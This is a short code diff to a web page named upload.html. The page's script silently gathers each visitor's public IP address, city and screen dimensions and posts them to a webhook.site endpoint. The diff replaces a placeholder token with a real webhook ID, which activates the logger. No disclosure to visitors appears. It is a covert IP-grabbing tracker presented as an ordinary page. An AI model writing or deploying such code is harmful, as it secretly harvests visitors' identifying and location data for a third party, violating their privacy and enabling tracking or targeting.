--- a/r/upload.html
+++ b/r/upload.html
@@ -17,7 +17,7 @@ fetch("https://api.ipify.org?format=json")
           sh: screen.height,
           city: geo.city
         };
-        fetch("https://webhook.site/SEU_TOKEN",{method:"POST",body:JSON.stringify(hit),headers:{"Content-Type":"application/json"}});
+        fetch("https://webhook.site/5ca87817-0e0b-4a00-9dad-19840499be75",{method:"POST",body:JSON.stringify(hit),headers:{"Content-Type":"application/json"}});
       });
   });
 </script>
